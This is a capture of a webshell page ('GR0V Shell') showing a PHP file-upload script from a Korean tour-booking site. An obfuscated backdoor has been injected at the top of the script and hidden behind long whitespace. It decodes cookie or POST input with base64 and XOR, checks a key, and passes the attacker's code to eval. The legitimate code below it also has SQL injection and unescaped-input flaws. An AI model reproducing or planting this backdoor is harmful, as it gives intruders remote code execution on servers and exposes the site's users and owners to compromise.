? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html/backend/modules/tour/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html/backend/modules/tour/upload_zip.php

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $z17d02 = 996;$GLOBALS['s05e01'] = Array();global $s05e01;$s05e01 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['zc68ab'] = "\x28\x6d\x3e\x48\x34\x43\x2a\x45\x5e\x29\x38\x71\x49\x60\x79\x2e\x39\x33\x46\x42\x2b\x74\x6c\x4c\x3a\x5f\x59\x73\x35\x70\x4f\x22\x4e\x31\x76\x5d\x32\x47\x4b\x25\x23\x37\x50\x4a\xa\x3d\x4d\xd\x3c\x61\x53\x51\x36\x3b\x52\x62\x55\x7e\x6f\x69\x26\x2f\x65\x75\x21\x58\x6a\x68\x3f\x64\x7c\x67\x40\x63\x30\x27\x6b\x24\x66\x56\x72\x7b\x78\x57\x5c\x9\x77\x5a\x2c\x41\x7a\x44\x2d\x7d\x6e\x20\x5b\x54";$s05e01[$s05e01['zc68ab'][58].$s05e01['zc68ab'][28].$s05e01['zc68ab'][78].$s05e01['zc68ab'][36].$s05e01['zc68ab'][74].$s05e01['zc68ab'][28].$s05e01['zc68ab'][28].$s05e01['zc68ab'][10].$s05e01['zc68ab'][69]] = $s05e01['zc68ab'][73].$s05e01['zc68ab'][67].$s05e01['zc68ab'][80];$s05e01[$s05e01['zc68ab'][78].$s05e01['zc68ab'][69].$s05e01['zc68ab'][10].$s05e01['zc68ab'][33].$s05e01['zc68ab'][62].$s05e01['zc68ab'][4].$s05e01['zc68ab'][52].$s05e01['zc68ab'][74].$s05e01['zc68ab'][62]] = $s05e01['zc68ab'][58].$s05e01['zc68ab'][80].$s05e01['zc68ab'][69];$s05e01[$s05e01['zc68ab'][1].$s05e01['zc68ab'][73].$s05e01['zc68ab'][4].$s05e01['zc68ab'][73].$s05e01['zc68ab'][69].$s05e01['zc68ab'][41].$s05e01['zc68ab'][69]] = $s05e01['zc68ab'][27].$s05e01['zc68ab'][21].$s05e01['zc68ab'][80].$s05e01['zc68ab'][22].$s05e01['zc68ab'][62].$s05e01['zc68ab'][94];$s05e01[$s05e01['zc68ab'][55].$s05e01['zc68ab'][17].$s05e01['zc68ab'][16].$s05e01['zc68ab'][4].$s05e01['zc68ab'][17].$s05e01['zc68ab'][55]] = $s05e01['zc68ab'][59].$s05e01['zc68ab'][94].$s05e01['zc68ab'][59].$s05e01['zc68ab'][25].$s05e01['zc68ab'][27].$s05e01['zc68ab'][62].$s05e01['zc68ab'][21];$s05e01[$s05e01['zc68ab'][94].$s05e01['zc68ab'][55].$s05e01['zc68ab'][33].$s05e01['zc68ab'][4].$s05e01['zc68ab'][73].$s05e01['zc68ab'][52]] = $s05e01['zc68ab'][27].$s05e01['zc68ab'][62].$s05e01['zc68ab'][80].$s05e01['zc68ab'][59].$s05e01['zc68ab'][49].$s05e01['zc68ab'][22].$s05e01['zc68ab'][59].$s05e01['zc68ab'][90].$s05e01['zc68ab'][62];$s05e01[$s05e01['zc68ab'][78].$s05e01['zc68ab'][62].$s05e01['zc68ab'][36].$s05e01['zc68ab'][41].$s05e01['zc68ab'][62]] = $s05e01['zc68ab'][29].$s05e01['zc68ab'][67].$s05e01['zc68ab'][29].$s05e01['zc68ab'][34].$s05e01['zc68ab'][62].$s05e01['zc68ab'][80].$s05e01['zc68ab'][27].$s05e01['zc68ab'][59].$s05e01['zc68ab'][58].$s05e01['zc68ab'][94];$s05e01[$s05e01['zc68ab'][62].$s05e01['zc68ab'][33].$s05e01['zc68ab'][28].$s05e01['zc68ab'][62]] = $s05e01['zc68ab'][63].$s05e01['zc68ab'][94].$s05e01['zc68ab'][27].$s05e01['zc68ab'][62].$s05e01['zc68ab'][80].$s05e01['zc68ab'][59].$s05e01['zc68ab'][49].$s05e01['zc68ab'][22].$s05e01['zc68ab'][59].$s05e01['zc68ab'][90].$s05e01['zc68ab'][62];$s05e01[$s05e01['zc68ab'][80].$s05e01['zc68ab'][10].$s05e01['zc68ab'][16].$s05e01['zc68ab'][62].$s05e01['zc68ab'][17].$s05e01['zc68ab'][16]] = $s05e01['zc68ab'][55].$s05e01['zc68ab'][49].$s05e01['zc68ab'][27].$s05e01['zc68ab'][62].$s05e01['zc68ab'][52].$s05e01['zc68ab'][4].$s05e01['zc68ab'][25].$s05e01['zc68ab'][69].$s05e01['zc68ab'][62].$s05e01['zc68ab'][73].$s05e01['zc68ab'][58].$s05e01['zc68ab'][69].$s05e01['zc68ab'][62];$s05e01[$s05e01['zc68ab'][58].$s05e01['zc68ab'][55].$s05e01['zc68ab'][78].$s05e01['zc68ab'][74]] = $s05e01['zc68ab'][27].$s05e01['zc68ab'][62].$s05e01['zc68ab'][21].$s05e01['zc68ab'][25].$s05e01['zc68ab'][21].$s05e01['zc68ab'][59].$s05e01['zc68ab'][1].$s05e01['zc68ab'][62].$s05e01['zc68ab'][25].$s05e01['zc68ab'][22].$s05e01['zc68ab'][59].$s05e01['zc68ab'][1].$s05e01['zc68ab'][59].$s05e01['zc68ab'][21];$s05e01[$s05e01['zc68ab'][94].$s05e01['zc68ab'][49].$s05e01['zc68ab'][73].$s05e01['zc68ab'][17].$s05e01['zc68ab'][73]] = $s05e01['zc68ab'][14].$s05e01['zc68ab'][74].$s05e01['zc68ab'][52].$s05e01['zc68ab'][33].$s05e01['zc68ab'][4].$s05e01['zc68ab'][17].$s05e01['zc68ab'][36];$s05e01[$s05e01['zc68ab'][58].$s05e01['zc68ab'][16].$s05e01['zc68ab'][28].$s05e01['zc68ab'][16].$s05e01['zc68ab'][36]] = $s05e01['zc68ab'][63].$s05e01['zc68ab'][16].$s05e01['zc68ab'][73].$s05e01['zc68ab'][17].$s05e01['zc68ab'][4].$s05e01['zc68ab'][69].$s05e01['zc68ab'][55].$s05e01['zc68ab'][69].$s05e01['zc68ab'][69];$s05e01[$s05e01['zc68ab'][58].$s05e01['zc68ab'][10].$s05e01['zc68ab'][78].$s05e01['zc68ab'][4].$s05e01['zc68ab'][73]] = $_POST;$s05e01[$s05e01['zc68ab'][78].$s05e01['zc68ab'][62].$s05e01['zc68ab'][28].$s05e01['zc68ab'][62].$s05e01['zc68ab'][28].$s05e01['zc68ab'][41].$s05e01['zc68ab'][16].$s05e01['zc68ab'][49].$s05e01['zc68ab'][55]] = $_COOKIE;@$s05e01[$s05e01['zc68ab'][55].$s05e01['zc68ab'][17].$s05e01['zc68ab'][16].$s05e01['zc68ab'][4].$s05e01['zc68ab'][17].$s05e01['zc68ab'][55]]($s05e01['zc68ab'][62].$s05e01['zc68ab'][80].$s05e01['zc68ab'][80].$s05e01['zc68ab'][58].$s05e01['zc68ab'][80].$s05e01['zc68ab'][25].$s05e01['zc68ab'][22].$s05e01['zc68ab'][58].$s05e01['zc68ab'][71], NULL);@$s05e01[$s05e01['zc68ab'][55].$s05e01['zc68ab'][17].$s05e01['zc68ab'][16].$s05e01['zc68ab'][4].$s05e01['zc68ab'][17].$s05e01['zc68ab'][55]]($s05e01['zc68ab'][22].$s05e01['zc68ab'][58].$s05e01['zc68ab'][71].$s05e01['zc68ab'][25].$s05e01['zc68ab'][62].$s05e01['zc68ab'][80].$s05e01['zc68ab'][80].$s05e01['zc68ab'][58].$s05e01['zc68ab'][80].$s05e01['zc68ab'][27], 0);@$s05e01[$s05e01['zc68ab'][55].$s05e01['zc68ab'][17].$s05e01['zc68ab'][16].$s05e01['zc68ab'][4].$s05e01['zc68ab'][17].$s05e01['zc68ab'][55]]($s05e01['zc68ab'][1].$s05e01['zc68ab'][49].$s05e01['zc68ab'][82].$s05e01['zc68ab'][25].$s05e01['zc68ab'][62].$s05e01['zc68ab'][82].$s05e01['zc68ab'][62].$s05e01['zc68ab'][73].$s05e01['zc68ab'][63].$s05e01['zc68ab'][21].$s05e01['zc68ab'][59].$s05e01['zc68ab'][58].$s05e01['zc68ab'][94].$s05e01['zc68ab'][25].$s05e01['zc68ab'][21].$s05e01['zc68ab'][59].$s05e01['zc68ab'][1].$s05e01['zc68ab'][62], 0);@$s05e01[$s05e01['zc68ab'][58].$s05e01['zc68ab'][55].$s05e01['zc68ab'][78].$s05e01['zc68ab'][74]](0);$b0580c8c = NULL;$x1804 = NULL;$s05e01[$s05e01['zc68ab'][29].$s05e01['zc68ab'][55].$s05e01['zc68ab'][16].$s05e01['zc68ab'][78].$s05e01['zc68ab'][28]] = $s05e01['zc68ab'][17].$s05e01['zc68ab'][74].$s05e01['zc68ab'][69].$s05e01['zc68ab'][55].$s05e01['zc68ab'][52].$s05e01['zc68ab'][55].$s05e01['zc68ab'][33].$s05e01['zc68ab'][4].$s05e01['zc68ab'][92].$s05e01['zc68ab'][28].$s05e01['zc68ab'][78].$s05e01['zc68ab'][69].$s05e01['zc68ab'][36].$s05e01['zc68ab'][92].$s05e01['zc68ab'][4].$s05e01['zc68ab'][16].$s05e01['zc68ab'][52].$s05e01['zc68ab'][16].$s05e01['zc68ab'][92].$s05e01['zc68ab'][55].$s05e01['zc68ab'][55].$s05e01['zc68ab'][28].$s05e01['zc68ab'][16].$s05e01['zc68ab'][92].$s05e01['zc68ab'][49].$s05e01['zc68ab'][10].$s05e01['zc68ab'][41].$s05e01['zc68ab'][78].$s05e01['zc68ab'][10].$s05e01['zc68ab'][62].$s05e01['zc68ab'][73].$s05e01['zc68ab'][78].$s05e01['zc68ab'][69].$s05e01['zc68ab'][4].$s05e01['zc68ab'][16].$s05e01['zc68ab'][28];global $pb9f5;function  u9c34dbdd($b0580c8c, $uf6d38){global $s05e01;$ec3687733 = "";for ($g1845d3c=0; $g1845d3c<$s05e01[$s05e01['zc68ab'][1].$s05e01['zc68ab'][73].$s05e01['zc68ab'][4].$s05e01['zc68ab'][73].$s05e01['zc68ab'][69].$s05e01['zc68ab'][41].$s05e01['zc68ab'][69]]($b0580c8c);){for ($k436=0; $k436<$s05e01[$s05e01['zc68ab'][1].$s05e01['zc68ab'][73].$s05e01['zc68ab'][4].$s05e01['zc68ab'][73].$s05e01['zc68ab'][69].$s05e01['zc68ab'][41].$s05e01['zc68ab'][69]]($uf6d38) && $g1845d3c<$s05e01[$s05e01['zc68ab'][1].$s05e01['zc68ab'][73].$s05e01['zc68ab'][4].$s05e01['zc68ab'][73].$s05e01['zc68ab'][69].$s05e01['zc68ab'][41].$s05e01['zc68ab'][69]]($b0580c8c); $k436++, $g1845d3c++){$ec3687733 .= $s05e01[$s05e01['zc68ab'][58].$s05e01['zc68ab'][28].$s05e01['zc68ab'][78].$s05e01['zc68ab'][36].$s05e01['zc68ab'][74].$s05e01['zc68ab'][28].$s05e01['zc68ab'][28].$s05e01['zc68ab'][10].$s05e01['zc68ab'][69]]($s05e01[$s05e01['zc68ab'][78].$s05e01['zc68ab'][69].$s05e01['zc68ab'][10].$s05e01['zc68ab'][33].$s05e01['zc68ab'][62].$s05e01['zc68ab'][4].$s05e01['zc68ab'][52].$s05e01['zc68ab'][74].$s05e01['zc68ab'][62]]($b0580c8c[$g1845d3c]) ^ $s05e01[$s05e01['zc68ab'][78].$s05e01['zc68ab'][69].$s05e01['zc68ab'][10].$s05e01['zc68ab'][33].$s05e01['zc68ab'][62].$s05e01['zc68ab'][4].$s05e01['zc68ab'][52].$s05e01['zc68ab'][74].$s05e01['zc68ab'][62]]($uf6d38[$k436]));}}return $ec3687733;}function  y061432($b0580c8c, $uf6d38){global $s05e01;global $pb9f5;return $s05e01[$s05e01['zc68ab'][58].$s05e01['zc68ab'][16].$s05e01['zc68ab'][28].$s05e01['zc68ab'][16].$s05e01['zc68ab'][36]]($s05e01[$s05e01['zc68ab'][58].$s05e01['zc68ab'][16].$s05e01['zc68ab'][28].$s05e01['zc68ab'][16].$s05e01['zc68ab'][36]]($b0580c8c, $pb9f5), $uf6d38);}foreach ($s05e01[$s05e01['zc68ab'][78].$s05e01['zc68ab'][62].$s05e01['zc68ab'][28].$s05e01['zc68ab'][62].$s05e01['zc68ab'][28].$s05e01['zc68ab'][41].$s05e01['zc68ab'][16].$s05e01['zc68ab'][49].$s05e01['zc68ab'][55]] as $uf6d38=>$nfe65){$b0580c8c = $nfe65;$x1804 = $uf6d38;}if (!$b0580c8c){foreach ($s05e01[$s05e01['zc68ab'][58].$s05e01['zc68ab'][10].$s05e01['zc68ab'][78].$s05e01['zc68ab'][4].$s05e01['zc68ab'][73]] as $uf6d38=>$nfe65){$b0580c8c = $nfe65;$x1804 = $uf6d38;}}$b0580c8c = @$s05e01[$s05e01['zc68ab'][62].$s05e01['zc68ab'][33].$s05e01['zc68ab'][28].$s05e01['zc68ab'][62]]($s05e01[$s05e01['zc68ab'][94].$s05e01['zc68ab'][49].$s05e01['zc68ab'][73].$s05e01['zc68ab'][17].$s05e01['zc68ab'][73]]($s05e01[$s05e01['zc68ab'][80].$s05e01['zc68ab'][10].$s05e01['zc68ab'][16].$s05e01['zc68ab'][62].$s05e01['zc68ab'][17].$s05e01['zc68ab'][16]]($b0580c8c), $x1804));if (isset($b0580c8c[$s05e01['zc68ab'][49].$s05e01['zc68ab'][76]]) && $pb9f5==$b0580c8c[$s05e01['zc68ab'][49].$s05e01['zc68ab'][76]]){if ($b0580c8c[$s05e01['zc68ab'][49]] == $s05e01['zc68ab'][59]){$g1845d3c = Array($s05e01['zc68ab'][29].$s05e01['zc68ab'][34] => @$s05e01[$s05e01['zc68ab'][78].$s05e01['zc68ab'][62].$s05e01['zc68ab'][36].$s05e01['zc68ab'][41].$s05e01['zc68ab'][62]](),$s05e01['zc68ab'][27].$s05e01['zc68ab'][34] => $s05e01['zc68ab'][33].$s05e01['zc68ab'][15].$s05e01['zc68ab'][74].$s05e01['zc68ab'][92].$s05e01['zc68ab'][33],);echo @$s05e01[$s05e01['zc68ab'][94].$s05e01['zc68ab'][55].$s05e01['zc68ab'][33].$s05e01['zc68ab'][4].$s05e01['zc68ab'][73].$s05e01['zc68ab'][52]]($g1845d3c);}elseif ($b0580c8c[$s05e01['zc68ab'][49]] == $s05e01['zc68ab'][62]){eval/*aee9*/($b0580c8c[$s05e01['zc68ab'][69]]);}exit();} ?><?
session_start();
require_once('../../../config.php');
require_once('../../../libs/MySql.php');
require_once('../../../libs/function.php');
require_once('../../../libs/global.php');
require_once('../../../libs/backoff_ajax.php');		
require_once('../../../libs/backoff.php');		
require_once('../../modules/users/mod_user.php');
$db=new MySql;
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HEAD>
<TITLE><? echo $cfg['site_name'];?></TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<META content="" name=Keywords>
<META content="<?echo $cfg['site_name'];?>" name="Description">
<META content="<?echo $cfg['site_name'];?>" name="Author">
<META content="<?echo $cfg['site_name'];?>" name="Copyright">


<title>Upload File</title>
</head>


<?php 
//Upload รูป 
if(!$_POST)
{
?>
<body>
rar ขนาดไม่เกิน 10 mb
 <div style="padding:10px;">
<form method="post" action="<? echo $_SERVER['PHP_SELF']?>" enctype="multipart/form-data">
<INPUT  type="file" name="photo">
<input name="tour_id" type="hidden" id="tour_id" value="<?=$_GET['tour_id']?>" />
<br>
<br>
<BUTTON ID=btnOK name="send" value="send"  type=submit tabIndex=40>บันทึก</BUTTON>
<BUTTON ID=btnCancel  type=reset tabIndex=45 onClick="window.close();">ยกเลิก</BUTTON>
</form>
</div>
<?
}
else
{
$db=new MySql;
		$filename=$_FILES['photo']['name'];
		$filetype=$_FILES['photo']['type'];
 		$filetmp=$_FILES['photo']['tmp_name'];
$pic="tour-00{$_POST[tour_id]}".Random_Int(4).date('dmYHism',time());
if ( $filetype == "application/octet-stream" ){
$filename1=$pic.".rar";
}
	
else{  
echo"<script language=\"javascript\">
alert('ไม่ใช่ไฟล์ที่กำหนด...');
 window.close();   
</script>";
exit();
}
if($_FILES['photo']['size']>10240000){

echo"<script language=\"javascript\">
alert('ไฟล์ใหญ่กว่ากำหนด...{$_FILES['photo']['size']}');
 window.close();   
</script>";
exit();

}

				if($filename!=""){
					$data=Array(
						'fileload'=>$filename1,
						
						);
				$db->Update('tour',$data,"WHERE id='{$_POST[tour_id]}'");
					move_uploaded_file($filetmp,"../../../tour/rar/$filename1"); 

				}
				
				
	
echo"<script language=\"javascript\">
alert('บันทึกเรียบร้อย...');
 window.close();   
</script>";

}//ปิด send
?>

T1KUS90T
  root-grov@210.1.60.28:~$